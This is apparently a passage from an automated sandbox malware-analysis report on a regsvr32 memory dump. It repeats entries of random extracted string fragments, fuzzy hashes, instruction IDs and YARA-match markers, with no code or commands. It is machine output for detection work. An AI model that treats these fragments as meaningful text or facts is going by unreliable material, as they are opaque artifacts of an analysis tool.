                                                                                                                      • String ID: PXl$S$C
                                                                                                                      • API String ID: 0-2035642645
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #X$r=h)$w?v,
                                                                                                                      • API String ID: 0-3790595521
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: u}4$wT$G
                                                                                                                      • API String ID: 0-2599976194
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: IB$fHm$y#
                                                                                                                      • API String ID: 0-1257940540
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 5&!$c69/$'
                                                                                                                      • API String ID: 0-406246438
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #X$*@$_T0
                                                                                                                      • API String ID: 0-1735694254
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ;N$&d$xyg
                                                                                                                      • API String ID: 0-4099939184
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      • String ID: wK!$w6T
                                                                                                                      • API String ID: 0-2345651858
                                                                                                                      • Opcode ID: 5b5673d920b0475acb6eaf035d4cf50cf512c04b11d85134ec945b217b15ae7b
                                                                                                                      • Instruction ID: f2c4ee1eac720261de8221f4e94bf971a4cb37d946f0d7bf39363f2c8cae5a05
                                                                                                                      • Opcode Fuzzy Hash: 5b5673d920b0475acb6eaf035d4cf50cf512c04b11d85134ec945b217b15ae7b
                                                                                                                      • Instruction Fuzzy Hash: E38176B551274DCFCB98DF28C69A59D3BE0FF59308F404129FC0A9A264D374E928CB49
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: fYA$ 6
                                                                                                                      • API String ID: 0-2239098682
                                                                                                                      • Opcode ID: ef5e2bff854fa64e08560e03ccf4bacdea2cbced946ab2932bb65b8f61935a9c
                                                                                                                      • Instruction ID: 95b1f226c8032eedf2056f3bc181879d75ec5f2651ad6373918ccd161046f0b7
                                                                                                                      • Opcode Fuzzy Hash: ef5e2bff854fa64e08560e03ccf4bacdea2cbced946ab2932bb65b8f61935a9c
                                                                                                                      • Instruction Fuzzy Hash: 95615F7011074D8BDB98CF28C8956EC3BA1FB48358F565329FC4AA63A0C778D985CF85
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Q$_K
                                                                                                                      • API String ID: 0-3406562042
                                                                                                                      • Opcode ID: 16b58ed7794577ff8617612d0cd026bc48ace6ce7b0e4d10c3389edfc49863fa
                                                                                                                      • Instruction ID: 613309a2e4086f874445892882934324b1793bc355ef50438d328036046f93ea
                                                                                                                      • Opcode Fuzzy Hash: 16b58ed7794577ff8617612d0cd026bc48ace6ce7b0e4d10c3389edfc49863fa
                                                                                                                      • Instruction Fuzzy Hash: 6E514C7051C7448FC7A9DF18D4867AAB7E0FB98350F909A1DE8CAC3251DF70A8598B86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: k$=
                                                                                                                      • API String ID: 0-2450263430
                                                                                                                      • Opcode ID: 944867476c26d9a728a2dd4f5d0b863e6d9a9954c4e836f5253c7b246162b0ce
                                                                                                                      • Instruction ID: ba362051472801d4597541ca10332c980f8f805137a937d53d7b006f2456742d
                                                                                                                      • Opcode Fuzzy Hash: 944867476c26d9a728a2dd4f5d0b863e6d9a9954c4e836f5253c7b246162b0ce
                                                                                                                      • Instruction Fuzzy Hash: 69517C71118B049BE7A9DF24C4897AABBE1FB84394F60591DF892C7361DB34D885CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "_^$ZA
                                                                                                                      • API String ID: 0-2525979066
                                                                                                                      • Opcode ID: 334c3b1ccc99c4196535f1586692f447595f8758e981802e11e67cae7b95d16f
                                                                                                                      • Instruction ID: 5100d127a314e06d6a4e2fbf05186db422f1eb31b8c7b43232414a62727caa3e
                                                                                                                      • Opcode Fuzzy Hash: 334c3b1ccc99c4196535f1586692f447595f8758e981802e11e67cae7b95d16f
                                                                                                                      • Instruction Fuzzy Hash: 8E512E705187848BC7A9DF28C18A65FFBF0FB86348F104A1DF6C686260D7B6D9498B43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 1/$^1
                                                                                                                      • API String ID: 0-2730909476
                                                                                                                      • Opcode ID: 5068b8716f72d74c2da312abcd3c93248f27383ad8c559ceb374f481949fa81d
                                                                                                                      • Instruction ID: d6d6ffe5abe184c7866148d753644a54eda7aa3821f10ce78c73aa975c295420
                                                                                                                      • Opcode Fuzzy Hash: 5068b8716f72d74c2da312abcd3c93248f27383ad8c559ceb374f481949fa81d
                                                                                                                      • Instruction Fuzzy Hash: 8F510270A1DB849FC7A8DF28C08565ABBF1FBC8744F909A1EF589C7260DB71D8448B42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: >ljL$sV#
                                                                                                                      • API String ID: 0-3085853521
                                                                                                                      • Opcode ID: 8163a4a740a8a9e8e59c1c53505ab1156dfe3b6c31cfff5498018919220e6d35
                                                                                                                      • Instruction ID: 3a9cf98d77ee43cf7027e8274459c02d03f3c6c72f4782606af54c6c5449dc17
                                                                                                                      • Opcode Fuzzy Hash: 8163a4a740a8a9e8e59c1c53505ab1156dfe3b6c31cfff5498018919220e6d35
                                                                                                                      • Instruction Fuzzy Hash: 0551C0B190034A8FCB48CF28D5865DE7FB0FB68398F114619E85AAA250E374D6A4CFD4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: k$=
                                                                                                                      • API String ID: 0-2450263430
                                                                                                                      • Opcode ID: 3734db1e1fa76b1deb8c37b08e7554336876f5d77f929da89127bd52957ad7dc
                                                                                                                      • Instruction ID: d8f5e407170489de2d35fa5aa27e4fab6d5800c1f5893964db3a969ff841ce59
                                                                                                                      • Opcode Fuzzy Hash: 3734db1e1fa76b1deb8c37b08e7554336876f5d77f929da89127bd52957ad7dc
                                                                                                                      • Instruction Fuzzy Hash: AC319C71218B44DBE7A9DF24C49A66BBBE1FB84384FA0591CF89286360CB30D844CB42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: fU$?G?
                                                                                                                      • API String ID: 0-3688660089
                                                                                                                      • Opcode ID: 8f188cdc42b724603917f636c2cd8a8d161c5f5019d22714e46c8456acd325da
                                                                                                                      • Instruction ID: 80650a0567581ba2c2b52a435e4591f75e49c46faa49eb55dc82b80356106ee2
                                                                                                                      • Opcode Fuzzy Hash: 8f188cdc42b724603917f636c2cd8a8d161c5f5019d22714e46c8456acd325da
                                                                                                                      • Instruction Fuzzy Hash: 4841D2B490034E8FCB48DF64D88A5DE7FF0FB68398F204619E815A6210D7B4D6A4CBD5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Z/$l`[
                                                                                                                      • API String ID: 0-385504739
                                                                                                                      • Opcode ID: 96b79094790b96d101aacec5acd1f279d05d7619810021c792a55c273ff4149e
                                                                                                                      • Instruction ID: 9323c780996b8fb8d500f23f2d46433da964d56aa2b69a22ef78b2d38eb40b27
                                                                                                                      • Opcode Fuzzy Hash: 96b79094790b96d101aacec5acd1f279d05d7619810021c792a55c273ff4149e
                                                                                                                      • Instruction Fuzzy Hash: 3841A2B180434E8BCB48DF68C98A5DE7FF0FB58358F114619F859A6250D3B89694CBC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ,v{$rG
                                                                                                                      • API String ID: 0-3254089575
                                                                                                                      • Opcode ID: 4478888d7a39aec4676c2f4194cda652c86ba7a28cab07bd365c66e68f3f47aa
                                                                                                                      • Instruction ID: a6b1a1d3199b417cc404c55e5dd1eb01a5f88ce71c8baedbe53c483da450d24d
                                                                                                                      • Opcode Fuzzy Hash: 4478888d7a39aec4676c2f4194cda652c86ba7a28cab07bd365c66e68f3f47aa
                                                                                                                      • Instruction Fuzzy Hash: BB41AFB090038E8FDF48CF68C88A5DE7BB0FB58348F114A19E865A6250D7B4D665CFC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <^$U
                                                                                                                      • API String ID: 0-3696377120
                                                                                                                      • Opcode ID: a39b1a8b9aa605c3d86dfe665907cc892806ea6a36a69ac2f18635df1d6b1402
                                                                                                                      • Instruction ID: e696d95e6ab2b410912a7bedf9d02d0f38519112f1f6bc965b4f6326cc0e0651
                                                                                                                      • Opcode Fuzzy Hash: a39b1a8b9aa605c3d86dfe665907cc892806ea6a36a69ac2f18635df1d6b1402
                                                                                                                      • Instruction Fuzzy Hash: 8C3192B06187818B874CDF28C55652ABBE1FBCC308F545B2DF4CAA63A0D338D601CB4A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: A&$u{
                                                                                                                      • API String ID: 0-1677111592
                                                                                                                      • Opcode ID: a0a3cf7e6962740fa14f6d176574c1a8c53e848f20a7d03528203b9b6192cc65
                                                                                                                      • Instruction ID: bf25f73c2140e7f503faede3eb1d12245a5b50dc524bf60877b1f6528db041e5
                                                                                                                      • Opcode Fuzzy Hash: a0a3cf7e6962740fa14f6d176574c1a8c53e848f20a7d03528203b9b6192cc65
                                                                                                                      • Instruction Fuzzy Hash: 2B31B6B190434E8FDF48DF68D84A5DE3BF0FB58358F004619E869A6250D3B8D664CBD5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Z$3d
                                                                                                                      • API String ID: 0-441683287
                                                                                                                      • Opcode ID: a821f7888bdb1d0ca56d2609269a474882ff489041936d722eecafd79d9eccc8
                                                                                                                      • Instruction ID: 894aa7aeded1cf0c47b578ab44e8e3808b502d3498fadbcad3e996152b127daf
                                                                                                                      • Opcode Fuzzy Hash: a821f7888bdb1d0ca56d2609269a474882ff489041936d722eecafd79d9eccc8
                                                                                                                      • Instruction Fuzzy Hash: 9F31A2B191034E8FCB48CF64D5866CE7FF0FB18398F615619F859A6220D37096A4CBC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ]S$tr
                                                                                                                      • API String ID: 0-635187309
                                                                                                                      • Opcode ID: 57074e57011b55c39ad93d5777d69e23ea94d41bc9deeb016e85ea98d1300dc1
                                                                                                                      • Instruction ID: aa873a07998187213442e9ee74ff36b06a254a2b96cc3890df0285d3550ddec4
                                                                                                                      • Opcode Fuzzy Hash: 57074e57011b55c39ad93d5777d69e23ea94d41bc9deeb016e85ea98d1300dc1
                                                                                                                      • Instruction Fuzzy Hash: 45319371569385ABC388DF28C48A81EBBE1FBC9308F806A1DF8C69A250D7759445CB43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $',.$Q
                                                                                                                      • API String ID: 0-1443989584
                                                                                                                      • Opcode ID: ad9c88e22ad3d823b850a3a299538f7846a727bc85cf8501cf0f95ecbdd1fc8a
                                                                                                                      • Instruction ID: df138cc2b08e372bfad779fe82dcfbb9a0b8e378e59a4e7d4551623b9726a53a
                                                                                                                      • Opcode Fuzzy Hash: ad9c88e22ad3d823b850a3a299538f7846a727bc85cf8501cf0f95ecbdd1fc8a
                                                                                                                      • Instruction Fuzzy Hash: 0731B0B081078E9FDB49CF65D88A5CE7BF0FB18758F104A19FC69A6210D3B49668CBC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 3FJ/$ZZ
                                                                                                                      • API String ID: 0-3277493576
                                                                                                                      • Opcode ID: 5d88d6d3b7520e1804a52e0c7b35c5f205cf44b28ce63282b14f42cac733b6c3
                                                                                                                      • Instruction ID: 311fd2de7ec090dba4a1009b1d0c161c4d4bee75f404523d402b7db5c8f85772
                                                                                                                      • Opcode Fuzzy Hash: 5d88d6d3b7520e1804a52e0c7b35c5f205cf44b28ce63282b14f42cac733b6c3
                                                                                                                      • Instruction Fuzzy Hash: B6318D745187848BC769DFA8C48984BFBF1FB96388F500A0CF68186660D7F5D889CB43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ^o$eoT
                                                                                                                      • API String ID: 0-3112795925
                                                                                                                      • Opcode ID: cf0a802fd5eb7a7a9f674cbe824f5b9cf21b0c0d4e40e037fad3e58b9b3c7516
                                                                                                                      • Instruction ID: 64542a0b199d1092939ac97feba9bfdb1f68517fca85a607133902b133d56c09
                                                                                                                      • Opcode Fuzzy Hash: cf0a802fd5eb7a7a9f674cbe824f5b9cf21b0c0d4e40e037fad3e58b9b3c7516
                                                                                                                      • Instruction Fuzzy Hash: 4A3179B4528781AFC788DF28D09981BBBF0FB89304FC06A2DF8968B254D371D449CB02
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 9ka8$X(<
                                                                                                                      • API String ID: 0-455423444
                                                                                                                      • Opcode ID: 9109840ee124d6567ee6c21cd6b70d321db5ae1db73f12f86acb22afcf4f2219
                                                                                                                      • Instruction ID: fb39a1ee18f27589520dc377fdda27f99ff556d13fde812dcf8a397f5c639900
                                                                                                                      • Opcode Fuzzy Hash: 9109840ee124d6567ee6c21cd6b70d321db5ae1db73f12f86acb22afcf4f2219
                                                                                                                      • Instruction Fuzzy Hash: 2F214C756183808B9749DF28C48A51BBBE0BBCD348F800B1DF4CEAA260D379D655CB4B
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 2u$St
                                                                                                                      • API String ID: 0-594449878
                                                                                                                      • Opcode ID: c11dc1c036c9458d47ee1719281c59fa50836b6797cdc2c58c3aae3dfa9c040d
                                                                                                                      • Instruction ID: b36bed944f56aa44062ec0f977d4ee498c5d405beb4cf7f3ad363434313a38c1
                                                                                                                      • Opcode Fuzzy Hash: c11dc1c036c9458d47ee1719281c59fa50836b6797cdc2c58c3aae3dfa9c040d
                                                                                                                      • Instruction Fuzzy Hash: 1A2156B050C7848BC398DF28D08941BBBE0BB8C718F400B5DF4DEA6260D3B8D6448B4A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: :Z
                                                                                                                      • API String ID: 0-405040171
                                                                                                                      • Opcode ID: 7bcd32ffb38326fb28c66ce6100505a24ecafbfaf6117a301a4d45dee812b795
                                                                                                                      • Instruction ID: 002928ab4ef23ec9070c376049f9f2a876a00f34c539a077b22a6462f3165597
                                                                                                                      • Opcode Fuzzy Hash: 7bcd32ffb38326fb28c66ce6100505a24ecafbfaf6117a301a4d45dee812b795
                                                                                                                      • Instruction Fuzzy Hash: 55E1F871E0460CAFDB59DFA8E486ADDBBF2FB48384F104119F906B7290D7B09919CB85
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 9%
                                                                                                                      • API String ID: 0-3705487092
                                                                                                                      • Opcode ID: c06a4efeff927d169bde34d03edd9c599d5ecfd38bff8a8ef453c913d6d7dcc5
                                                                                                                      • Instruction ID: 034f52ded3f62641215f60cf685d8f2d94a9732ee49177c47e4d189e471a63cd
                                                                                                                      • Opcode Fuzzy Hash: c06a4efeff927d169bde34d03edd9c599d5ecfd38bff8a8ef453c913d6d7dcc5
                                                                                                                      • Instruction Fuzzy Hash: 29E1E5B0604609CFDB98DF28C4856DE3BE1FF58318F41462AFC4AA7264D774DA98CB45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6~W
                                                                                                                      • API String ID: 0-2393260581
                                                                                                                      • Opcode ID: e8277394562caa02b2414f2a7b78424b3544c9a566d2d3bde7ccc6ae36ace73f
                                                                                                                      • Instruction ID: 26ead3f154a6122e610c6b122a9f1d348a780d35874abfa48b122ad12952c033
                                                                                                                      • Opcode Fuzzy Hash: e8277394562caa02b2414f2a7b78424b3544c9a566d2d3bde7ccc6ae36ace73f
                                                                                                                      • Instruction Fuzzy Hash: A3C156B590634DCFCB48DF68D29A99D7BF1FF59348F004129FC0A9A250E7B49528CB48
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: &
                                                                                                                      • API String ID: 0-2131812987
                                                                                                                      • Opcode ID: 09d3b03a8a252069e3b2d4f902ab4c27f10bc1e4e165ee879a8e780ef1927062
                                                                                                                      • Instruction ID: a7efdfd69dd5e5f3b1d408db4146beb7d9ed0063ef6bb91e38be87a0176c4c06
                                                                                                                      • Opcode Fuzzy Hash: 09d3b03a8a252069e3b2d4f902ab4c27f10bc1e4e165ee879a8e780ef1927062
                                                                                                                      • Instruction Fuzzy Hash: E161117061464C8BDB6ADF38C4966AD3BE4FB88744F20603DFC6687262DB70D90ACB40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
